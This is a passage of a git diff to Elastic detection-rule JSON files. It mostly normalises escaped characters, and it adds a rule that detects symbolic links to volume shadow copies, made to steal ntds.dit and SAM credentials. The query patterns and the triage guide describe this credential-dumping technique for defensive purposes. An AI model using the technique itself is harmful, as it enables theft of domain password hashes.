EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\") and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0", - "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_108.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_108.json index 8785f14ec6c..46b67b8efdb 100644 --- a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_108.json +++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_108.json @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0", - "setup": "\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_109.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_109.json new file mode 100644 index 00000000000..60526f4e918 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_109.json @@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials.", + "false_positives": [ + "Legitimate administrative activity related to shadow copies." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Symbolic Link to Shadow Copy Created", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n (process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\")) or\n (process.name : (\"cmd.exe\", \"powershell.exe\"))\n ) and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", + "https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf", + "https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/", + "https://www.hackingarticles.in/credential-dumping-ntds-dit/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0", + "setup": "\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + }, + { + "id": "T1003.003", + "name": "NTDS", + "reference": "https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_1.json b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_1.json index e56508caf27..7f9e53b44d1 100644 --- a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_1.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_2.json b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_2.json index 61e92211a74..5e0f1b9d28a 100644 --- a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_2.json +++ b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_2.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_3.json b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_3.json index 1d0ee00772d..60206f28c66 100644 --- a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_3.json +++ b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_3.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -66,7 +66,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_1.json b/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_1.json index 35f61f34e84..0773eeb22af 100644 --- a/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_1.json +++ b/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_1.json @@ -45,7 +45,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_2.json b/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_2.json index 014eeebe9c4..f672dbadde9 100644 --- a/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_2.json +++ b/packages/security_detection_engine/kibana/security_rule/d197478e-39f0-4347-a22f-ba654718b148_2.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_102.json b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_102.json index aa0f8619146..ccf09846bab 100644 --- a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_102.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_103.json b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_103.json index 2cdcf59434c..d08837038ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_103.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_104.json b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_104.json index e0da874d19d..fdfbd1564dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_104.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_105.json b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_105.json index ba3fb70a034..de0f763faa6 100644 --- a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_105.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_104.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_104.json index fdba714fb85..38728a454ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_104.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_105.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_105.json index a8ba76e7aaf..ce79d2314ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_105.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_106.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_106.json index b12a8b5eb64..efec1ff2caf 100644 --- a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_106.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_107.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_107.json index ff1ef667dbf..cd1fe2900ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_107.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_108.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_108.json index c48d554222d..46a25badd73 100644 --- a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_108.json +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_108.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_105.json b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_105.json index f2ee562cd2f..dab82395353 100644 --- a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_105.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_106.json b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_106.json index 2bee70b7522..b8b7140e041 100644 --- a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_106.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_107.json b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_107.json index 48b5ed18f08..f4a00d27da2 100644 --- a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_107.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_108.json b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_108.json index 06702c57be0..90b2b359d92 100644 --- a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_108.json +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_108.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_109.json 